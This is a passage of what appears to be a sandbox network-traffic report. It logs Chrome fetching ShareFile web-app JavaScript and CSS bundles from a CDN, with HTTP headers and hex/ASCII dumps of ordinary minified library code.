                                                                                                                                                                                                                                                                                115192.168.2.64984113.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC423OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1199131
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 12:55:38 GMT
                                                                                                                                                                                                                                                                                ETag: "5330d2180773e126082327cde098052b"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3b02f73dccc5077f1ad544a27a475ed6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 24Y_5xe3FgSVbhCf0xTOGXdTujGMA6nakeMPROdUwQW6UGqGi2Tvtw==
                                                                                                                                                                                                                                                                                Age: 45978
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC15834INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 73 6f 75 72 63 65 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},o={},s={};return Object.defineProperty(i,"__esModule",{
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 79 7c 63 61 70 74 75 72 65 7c 63 65 6c 6c 50 61 64 64 69 6e 67 7c 63 65 6c 6c 53 70 61 63 69 6e 67 7c 63 68 61 6c 6c 65 6e 67 65 7c 63 68 61 72 53 65 74 7c 63 68 65 63 6b 65 64 7c 63 69 74 65 7c 63 6c 61 73 73 49 44 7c 63 6c 61 73 73 4e 61 6d 65 7c 63 6f 6c 73 7c 63 6f 6c 53 70 61 6e 7c 63 6f 6e 74 65 6e 74 7c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7c 63 6f 6e 74 65 78 74 4d 65 6e 75 7c 63 6f 6e 74 72 6f 6c 73 7c 63 6f 6e 74 72 6f 6c 73 4c 69 73 74 7c 63 6f 6f 72 64 73 7c 63 72 6f 73 73 4f 72 69 67 69 6e 7c 64 61 74 61 7c 64 61 74 65 54 69 6d 65 7c 64 65 63 6f 64 69 6e 67 7c 64 65 66 61 75 6c 74 7c 64 65 66 65 72 7c 64 69 72 7c 64 69 73 61 62 6c 65 64 7c 64 69 73 61 62 6c 65 50 69 63 74 75 72 65 49 6e 50 69 63 74 75 72 65 7c 64 69 73 61 62 6c 65 52
                                                                                                                                                                                                                                                                                Data Ascii: y|capture|cellPadding|cellSpacing|challenge|charSet|checked|cite|classID|className|cols|colSpan|content|contentEditable|contextMenu|controls|controlsList|coords|crossOrigin|data|dateTime|decoding|default|defer|dir|disabled|disablePictureInPicture|disableR
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 3d 3d 45 26 26 43 28 76 29 29 3b 65 6c 73 65 20 6e 3d 69 3b 72 65 74 75 72 6e 20 6e 21 3d 3d 69 26 26 28 4c 3d 74 2c 6e 3d 77 28 29 29 2c 74 3d 6e 7d 69 66 28 28 72 3d 73 28 29 29 21 3d 3d 69 26 26 4d 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 72 3b 74 68 72 6f 77 20 72 21 3d 3d 69 26 26 4d 3c 65 2e 6c 65 6e 67 74 68 26 26 43 28 7b 74 79 70 65 3a 22 65 6e 64 22 7d 29 2c 49 28 44 2c 59 3c 65 2e 6c 65 6e 67 74 68 3f 65 2e 63 68 61 72 41 74 28 59 29 3a 6e 75 6c 6c 2c 59 3c 65 2e 6c 65 6e 67 74 68 3f 6a 28 59 2c 59 2b 31 29 3a 6a 28 59 2c 59 29 29 7d 7d 7d 2c 35 33 34 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65
                                                                                                                                                                                                                                                                                Data Ascii: ==E&&C(v));else n=i;return n!==i&&(L=t,n=w()),t=n}if((r=s())!==i&&M===e.length)return r;throw r!==i&&M<e.length&&C({type:"end"}),I(D,Y<e.length?e.charAt(Y):null,Y<e.length?j(Y,Y+1):j(Y,Y))}}},5349:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 65 29 7b 69 66 28 65 3d 65 2e 74 72 69 6d 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 21 31 3b 69 66 28 77 5b 65 5d 29 65 3d 77 5b 65 5d 2c 74 3d 21 30 3b 65 6c 73 65 20 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 65 29 72 65 74 75 72 6e 7b 72 3a 30 2c 67 3a 30 2c 62 3a 30 2c 61 3a 30 2c 66 6f 72 6d 61 74 3a 22 6e 61 6d 65 22 7d 3b 76 61 72 20 6e 3d 44 2e 72 67 62 2e 65 78 65 63 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 7b 72 3a 6e 5b 31 5d 2c 67 3a 6e 5b 32 5d 2c 62 3a 6e 5b 33 5d 7d 3b 69 66 28 6e 3d 44 2e 72 67 62 61 2e 65 78 65 63 28 65 29 2c 6e 29 72 65 74 75 72 6e 7b 72 3a 6e 5b 31 5d 2c 67 3a 6e 5b 32 5d 2c 62 3a 6e 5b 33 5d 2c 61 3a 6e 5b 34
                                                                                                                                                                                                                                                                                Data Ascii: e){if(e=e.trim().toLowerCase(),0===e.length)return!1;var t=!1;if(w[e])e=w[e],t=!0;else if("transparent"===e)return{r:0,g:0,b:0,a:0,format:"name"};var n=D.rgb.exec(e);if(n)return{r:n[1],g:n[2],b:n[3]};if(n=D.rgba.exec(e),n)return{r:n[1],g:n[2],b:n[3],a:n[4
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 72 69 62 65 28 29 7b 7d 7d 63 6f 6e 73 74 20 6f 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3e 3d 30 26 26 65 21 3d 3d 31 2f 30 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 66 69 6c 74 65 72 28 28 65 3d 3e 2d 31 3d 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 65 2b 28 74 7c 7c 30 29 2d 44 61 74 65 2e 6e 6f 77 28 29 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 59 28 65 29 3f 22 66
                                                                                                                                                                                                                                                                                Data Ascii: ribe(){}}const o="undefined"==typeof window;function s(){}function c(e){return"number"==typeof e&&e>=0&&e!==1/0}function l(e,t){return e.filter((e=>-1===t.indexOf(e)))}function u(e,t){return Math.max(e+(t||0)-Date.now(),0)}function d(e,t,n){return Y(e)?"f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 2c 74 79 70 65 3a 22 75 70 64 61 74 65 64 22 2c 61 63 74 69 6f 6e 3a 65 7d 29 7d 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 7b 63 6f 6e 74 65 78 74 3a 76 6f 69 64 20 30 2c 64 61 74 61 3a 76 6f 69 64 20 30 2c 65 72 72 6f 72 3a 6e 75 6c 6c 2c 66 61 69 6c 75 72 65 43 6f 75 6e 74 3a 30 2c 69 73 50 61 75 73 65 64 3a 21 31 2c 73 74 61 74 75 73 3a 22 69 64 6c 65 22 2c 76 61 72 69 61 62 6c 65 73 3a 76 6f 69 64 20 30 7d 7d 63 6c 61 73 73 20 57 20 65 78 74 65 6e 64 73 20 61 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 3d 30 7d 62 75 69 6c 64 28 65 2c 74 2c 6e 29
                                                                                                                                                                                                                                                                                Data Ascii: ,type:"updated",action:e})}))}}function q(){return{context:void 0,data:void 0,error:null,failureCount:0,isPaused:!1,status:"idle",variables:void 0}}class W extends a{constructor(e){super(),this.config=e||{},this.mutations=[],this.mutationId=0}build(e,t,n)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 74 69 6f 6e 73 7c 7c 5b 5d 2c 6f 3d 74 2e 71 75 65 72 69 65 73 7c 7c 5b 5d 3b 61 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 76 61 72 20 69 3b 72 2e 62 75 69 6c 64 28 65 2c 7b 2e 2e 2e 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 28 69 3d 6e 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 29 3f 76 6f 69 64 20 30 3a 69 2e 6d 75 74 61 74 69 6f 6e 73 2c 6d 75 74 61 74 69 6f 6e 4b 65 79 3a 74 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 7d 2c 74 2e 73 74 61 74 65 29 7d 29 29 2c 6f 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 76 61 72 20 72 3b 63 6f 6e 73 74 20 61 3d 69 2e 67 65 74 28 74 2e 71 75 65 72 79 48 61 73 68 29 3b 61 3f 61 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 3c 74 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 26 26 61 2e 73 65 74
                                                                                                                                                                                                                                                                                Data Ascii: tions||[],o=t.queries||[];a.forEach((t=>{var i;r.build(e,{...null==n||null==(i=n.defaultOptions)?void 0:i.mutations,mutationKey:t.mutationKey},t.state)})),o.forEach((t=>{var r;const a=i.get(t.queryHash);a?a.state.dataUpdatedAt<t.state.dataUpdatedAt&&a.set
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 73 74 28 73 28 6e 7c 7c 7b 7d 2c 7b 6d 65 74 68 6f 64 3a 65 2c 75 72 6c 3a 74 2c 64 61 74 61 3a 28 6e 7c 7c 7b 7d 29 2e 64 61 74 61 7d 29 29 7d 7d 29 29 2c 72 2e 66 6f 72 45 61 63 68 28 5b 22 70 6f 73 74 22 2c 22 70 75 74 22 2c 22 70 61 74 63 68 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 69 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 71 75 65 73 74 28 73 28 69 7c 7c 7b 7d 2c 7b 6d 65 74 68 6f 64 3a 65 2c 68 65 61 64 65 72 73 3a 74 3f 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 22 7d 3a 7b 7d 2c 75 72 6c 3a 6e 2c 64 61 74 61 3a 72 7d 29 29 7d 7d 64 2e 70 72 6f 74 6f 74 79 70 65 5b 65
                                                                                                                                                                                                                                                                                Data Ascii: st(s(n||{},{method:e,url:t,data:(n||{}).data}))}})),r.forEach(["post","put","patch"],(function(e){function t(t){return function(n,r,i){return this.request(s(i||{},{method:e,headers:t?{"Content-Type":"multipart/form-data"}:{},url:n,data:r}))}}d.prototype[e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 22 27 7d 5d 2c 21 31 7d 6b 3d 53 3d 3d 3d 6d 7d 65 6c 73 65 20 6b 3d 21 30 3b 69 66 28 6b 29 69 66 28 65 2e 74 79 70 65 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 59 3d 65 2e 74 79 70 65 2c 44 3d 6d 3b 69 66 28 6d 3d 3d 3d 44 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 59 29 72 65 74 75 72 6e 20 61 2e 65 72 72 6f 72 73 3d 5b 7b 69 6e 73 74 61 6e 63 65 50 61 74 68 3a 63 2b 22 2f 74 79 70 65 22 2c 73 63 68 65 6d 61 50 61 74 68 3a 22 23 2f 70 72 6f 70 65 72 74 69 65 73 2f 74 79 70 65 2f 74 79 70 65 22 2c 6b 65 79 77 6f 72 64 3a 22 74 79 70 65 22 2c 70 61 72 61 6d 73 3a 7b 74 79 70 65 3a 22 73 74 72 69 6e 67 22 7d 2c 6d 65 73 73 61 67 65 3a 22 6d 75 73 74 20 62 65 20 73 74 72 69 6e 67 22 7d 5d 2c 21 31 3b 69 66 28 21 69 2e 74
                                                                                                                                                                                                                                                                                Data Ascii: "'}],!1}k=S===m}else k=!0;if(k)if(e.type!==undefined){var Y=e.type,D=m;if(m===D){if("string"!=typeof Y)return a.errors=[{instancePath:c+"/type",schemaPath:"#/properties/type/type",keyword:"type",params:{type:"string"},message:"must be string"}],!1;if(!i.t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 4a 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 65 2e 6d 61 74 63 68 65 73 3b 74 2e 6d 61 74 63 68 65 73 3d 5b 5d 2c 6d 28 6e 29 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 21 6d 28 65 2e 69 6e 64 69 63 65 73 29 7c 7c 21 65 2e 69 6e 64 69 63 65 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 69 6e 64 69 63 65 73 3a 6e 2c 76 61 6c 75 65 3a 72 7d 3d 65 3b 6c 65 74 20 69 3d 7b 69 6e 64 69 63 65 73 3a 6e 2c 76 61 6c 75 65 3a 72 7d 3b 65 2e 6b 65 79 26 26 28 69 2e 6b 65 79 3d 65 2e 6b 65 79 2e 73 72 63 29 2c 65 2e 69 64 78 3e 2d 31 26 26 28 69 2e 72 65 66 49 6e 64 65 78 3d 65 2e 69 64 78 29 2c 74 2e 6d 61 74 63 68 65 73 2e 70 75 73 68 28 69 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 2c 74 29 7b 74 2e 73 63 6f 72 65 3d 65
                                                                                                                                                                                                                                                                                Data Ascii: J(e,t){const n=e.matches;t.matches=[],m(n)&&n.forEach((e=>{if(!m(e.indices)||!e.indices.length)return;const{indices:n,value:r}=e;let i={indices:n,value:r};e.key&&(i.key=e.key.src),e.idx>-1&&(i.refIndex=e.idx),t.matches.push(i)}))}function K(e,t){t.score=e


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                116192.168.2.64984313.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC574OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: s-whd0dQbZNgS9NyYIxBDUq-nVXqm918krGuM5xUEhIhlKK0JP6MYQ==
                                                                                                                                                                                                                                                                                Age: 83769
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                117192.168.2.64984413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC599OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 172013
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                                                                                ETag: "1b4bef66080aa287b1d9e5454fb07741"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c2a926ef1bafe1ab239d4761594a8098.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: zgwOY3p2T-YnSbtiV0HMX852qQG9JtSxoqKUzLr_aYpZI_AaM6bp1Q==
                                                                                                                                                                                                                                                                                Age: 45979
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6e 61 6e 74 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{})System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 74 69 6f 6e 54 6f 6b 65 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 69 6c 65 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 6f 6c 64 65 72 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 52 65 64 69 72 65 63 74 69 6f 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                Data Ascii: tionToken"===e["odata.type"]}function i(e){return e&&"ShareFile.Api.Models.File"===e["odata.type"]}function a(e){return e&&"ShareFile.Api.Models.Folder"===e["odata.type"]}function s(e){return e&&"ShareFile.Api.Models.Redirection"===e["odata.type"]}functio
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC2410INData Raw: 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 34 38 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 3f 7b 77 72 69 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 3d 5b 5d 3b 73 2e 70 75 73 68 28 65 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 2c 6e 2e 69 73 4e 75 6d 62 65 72 28 72 29 26 26 73 2e 70 75 73 68 28 22 65 78 70 69 72 65 73 3d 22 2b 6e 65 77 20 44 61 74 65 28 72 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 6f 29 26 26 73 2e 70 75 73 68 28 22 70 61 74 68 3d 22 2b 6f 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 69 29 26 26 73 2e 70 75 73 68 28
                                                                                                                                                                                                                                                                                Data Ascii: )=>{"use strict";var n=r(4867);e.exports=n.isStandardBrowserEnv()?{write:function(e,t,r,o,i,a){var s=[];s.push(e+"="+encodeURIComponent(t)),n.isNumber(r)&&s.push("expires="+new Date(r).toGMTString()),n.isString(o)&&s.push("path="+o),n.isString(i)&&s.push(
